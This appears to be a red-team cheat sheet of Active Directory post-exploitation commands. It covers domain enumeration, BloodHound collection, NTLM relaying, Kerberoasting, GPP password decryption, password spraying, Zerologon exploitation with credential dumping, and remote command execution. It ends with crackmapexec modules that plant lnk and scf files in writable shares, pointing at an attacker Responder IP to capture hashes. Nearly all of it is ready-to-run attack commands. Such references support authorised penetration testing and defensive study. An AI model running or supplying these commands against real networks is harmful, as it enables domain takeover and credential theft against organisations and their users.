Skip to content

Basics on what to do upon getting shell/rce #

Note: Try as much as possible to Live off the land

Good blogs for these: #

Also keep these vulnerabilities that Microsoft Won't Fix in mind when performing domain enumeration.


Just basic stuff #

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
whoami /all
hostname
ipconfig /all
systeminfo
query user
qwinsta
gpresult /R 
dir
tree /f /a
tasklist /V
net user
net user /domain
net user <username>
net user <username> /domain
net localgroup
net localgroup administrators
net groups /domain
net group "<group>" /domain
net group "domain admins" /domain
klist

NLTest1 #

1
2
3
nltest /dclist:<domain>
nltest /dsgetdc:<domain>
nltest /domain_trusts /all_trusts

Powershell Enumeration1 #

1
2
3
4
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', '<domain>')))).GetAllTrustRelationships()

Tools for automating enumeration #


Dumping credentials #


Bloodhound (Sharphound)2 #

  1. On local machine (~Kali)

    • Bloodhound Installation19
    • Running bloodhound ingestor from linux:
      1
      2
      3
      4
      5
      cd /opt
      git clone https://github.com/fox-it/BloodHound.py
      cd BloodHound.py
      sudo docker run -v ${PWD}:/bloodhound-data -it bloodhound
      # bloodhound-python -d domain.local -u user01 -p P@ssw0rd -c all,loggedon --zip
      
  2. Sharphound Officialy supported ingestors 34

    • Running the official/supported Sharphound Collectors collects more information [
      • although Bloodhound.py is quick and good for most cases
    • Running on the victim host
      1
      .\SharpHound.exe -c all --encryptzip --nosavecache --zipfilename bh.zip -d domain.local
      
    • Runas
      • If logged in on a local user account but have domain user credentials, then on the command-line
      • This works also to get SharpHound to work and ingest data even if your own Windows VM is not part of the Domain.
        • This bypasses the need to run SharpHound on the host itself with AVs/ERDs
          1
          2
          3
          4
          C:\> runas /netonly /user:<DOMAIN>\<username> "powershell.exe -exec bypass"
          
          # then on the spawned powershell
          .\SharpHound.exe -c all --nosavecache --zipfilename bh.zip -d domain.local
          
    • Run after sharphound for some nice statistics
    • Mass import owned users in Bloodhound14
    • Bloodhound Custom Queries
    • Bloodhound attacks
      • GenericAll 15
        • Although the commands in the reference work, I found that it was easier to modify permissions and other actions (reset user password) using RSAT.
        • If you're Windows attacking VM is connected to the network, just run mmc as a domain user (provided you already have the domain user's credentials).

NTLM Relaying #

  • Basic NTLM Relay
    • Gather NTLM Relay list using crackmapexec
      • crackmapexec smb --gen-relay-list relay_list.txt company_internal_subnets.txt
        1
        2
        sudo impacket-ntlmrelayx -socks -smb2support -of output.txt -tf ./relay_list.txt -c ipconfig
        sudo responder -I eth1 -Pvd
        

General Attack methods #

  • Methods 56
    • NTLM Relay18
    • Golden Ticket
      • Requires full domain compromise.
      • Used for persistenceand pivoting
    • Kerberoasting
      • Requires access as any user.
      • Use to escalateand pivot
    • Silver Ticket
      • Requires service hash.
      • Use for persistenceand escalation
    • Pass-the-Ticket
      • Requires access as user.
      • Use to pivot
    • Over-Pass-the-Hash
      • Requires access as user.
      • Use to pivot

Kerberoasting #

  1. From Linux 17

    • Beware of time difference of the attacking machine (Kali) and the targeted Domain Controller
      1
      GetUserSPNs.py -debug -request -outputfile TGS_file.txt -dc-ip <DC_IP_Address> <FQDN>/<username>
      
  2. From Windows

    • PowerSploit
      1
      Invoke-Kerberoast -Domain domain.com -OutputFormat hashcat
      
      • Getting SPN ticekts of from an external external forest
        • Works if there is trust towards the domain you are in
          1
          Get-DomainSPNTicket <SERVICE>/DC01.domain-external.com@domain-external.com
          

Password Cracking * Refer to m0chan's blog

1
hashcat64.exe -a 3 -m 13100 SPN.hash /wordlists/rockyou.txt


Gathering Windows GPP passwords8 #

  1. On target machine logged-on with a regular domain account
    1
    findstr /S cpassword \\<domain_controller>\sysvol\*.xml
    
  2. On local machine (~Kali)
    1
    gpp-decrypt <cpassword_value>
    

ADFind9 #

1
2
adfind.exe -f objectclass=trusteddomain
adfind.exe -sc trustdmp

ADRecon10 #

1
2
# On your own Windows VM after "runas" command
.\ADRecon.ps1 -Method LDAP -DomainControler dc01.acme.local -Credential ACME\user01

RSAT #

  • Run RSAT from a non-domain joined PC
    1
    2
    runas /netonly /user:<DOMAIN>\<username> "mmc /server=<DC or domain>"
    runas /netonly /user:ACME\bob.normal.user "mmc /server=dc01.acme.local"
    

Domain Password Spraying #

Dafthack's DomainPasswordSpray11 #

  • Retrieves the list of domain users, sprays and attempts to detect lockout threshold of a user and stops spraying
    1
    2
    Import-Module .\DomainPasswordSpray.ps1
    Invoke-DomainPasswordSpray -Password Spring2017
    

Find interesting Domain Share Files12 #

  • Find-InterestingDomainShareFile
    1
    Find-InterestingDomainShareFile
    
  • Snaffler
    1
    2
    runas /netonly /user:domain.local\victim01 cmd.exe
    snaffler.exe -s -o snaffler_.log
    
  • Crackmapexec
    • Also refer to this
      1
      crackmapexec smb -d domain.local -u victim01 -p P@ssw0rd -M spider_plus
      

Direct Attacks to the Domain Controller #

Zerologon 1617 #

  • Resets machine account of vulnerable domain controller
    • Remember to restore the password after
1
2
3
4
5
python3 zerologon_tester.py dc02 10.10.10.20 # From securaBV

python3 cve-2020-1472-exploit.py dc02 10.10.10.20 # From dirkjanm

secretsdump.py -no-pass -just-dc acme.local/dc02\$@10.10.10.20 # From impacket
  • Password restoration process
     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe acme.local/[email protected]
    cd Windows/temp
    reg save HKLM\SYSTEM system.save
    reg save HKLM\SAM sam.save
    reg save HKLM\SECURITY security.save
    
    smbclient \\\\10.10.10.20\\c$ -U 'acme.local\\administrator%2b576acbe6bcfda7294d6bd18041b8fe' --pw-nt-hash
    cd Windows/temp
    get system.save
    get security.save
    get sam.save
    
    
    wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe acme.local/[email protected]
    cd Windows/temp
    del system.save
    del security.save
    del sam.save
    
    
    secretsdump.py -sam sam.save -system system.save -security security.save local
    
    python3 restorepassword.py acme.local/dc02@dc02 -target-ip 10.10.10.20  -hexpass ef464f4194d9f401af41c9982dc7c85524cc9ed8adef4fe24c8044d13f1ae41c594131d2d46cab3a0d3384cda94baae65d5a87d26df1201ff6ff1697672ac4e16c16f0e514f6e54d84342c5af4193fe96329e3a30fb84c08845e7a289749225276c7c2e3181555fa5eef21d4d1ba23aba0f4706383327b299283f72b7df6b661cfb11189bd8b3ab552ffb99aa12ffe19b760e00e143ef3e776d8377da57925c5ed71aa9f0991acff7fc9c963addb8496fdd273f231e15a51d99f41a770de714573b26795c45a03eac80e3bb45ac5c100740da5814c3979e5349e8471623086c80f6160163f4bd56da3b75a6deb17b1020 # From dirkjanm
    
    secretsdump.py -no-pass -just-dc acme.local/dc02\$@10.10.10.20
    

Pivoting #

Executing Commands Remotely #

PsExec #

Powershell Remote Session (PSRemote) #

  • "Usual" requirement is that you must be in the same subnet as the machine you are connecting to
  • Create a session
    • Without specified credentials
      1
      2
      New-PSSession dc01.domain.com
      $s = New-PSSession dc01.domain.com
      
    • Create a session with credentials
      1
      2
      $cred = get-credential
      New-PSSession dc01.domain.com Credential $cred
      
  • Run commands remotely via PSSession
    1
    Invoke-Command -Session $s -FilePath C:\Temp\Rubeus.ps1
    
  • Interactive PSSession
    1
    Enter-PSSession -Id <#>
    
  • Exit PSSession
    1
    Remove-PSSession -Id <#>
    

Windows Remote Management #

1
winrs -r:DC01.domain.com cmd

WMIC #

  • Run a DLL file remotely using wmic via installutil15
    1
    wmic /node:dc01.domain.com process call create "cmd.exe /c \windows\microsoft.net\framework64\v4.0.30319\installutil.exe /logfile= /u \temp\file.dll"
    

Creating lnk file in writable shares #

  • None opsec safe
  • In my experience, IT noticed randomly generated folder names (not necessarily a file)
  • Still good to be inserted in phishing email attachments and USB drops (combine with knary)
    1
    2
    crackmapexec smb /home/kali/Scope/writable_shares.txt -d domain.local -u user01 -p P@ssw0rd -M slinky -o SERVER=<ATTACKER_RESPONDER_IP> NAME=Microsoft_UpdateLnk
    crackmapexec smb /home/kali/Scope/writable_shares.txt -d domain.local -u user01 -p P@ssw0rd -M scuffy -o SERVER=<ATTACKER_RESPONDER_IP> NAME=Microsoft_UpdateScf
    

Last update: April 28, 2022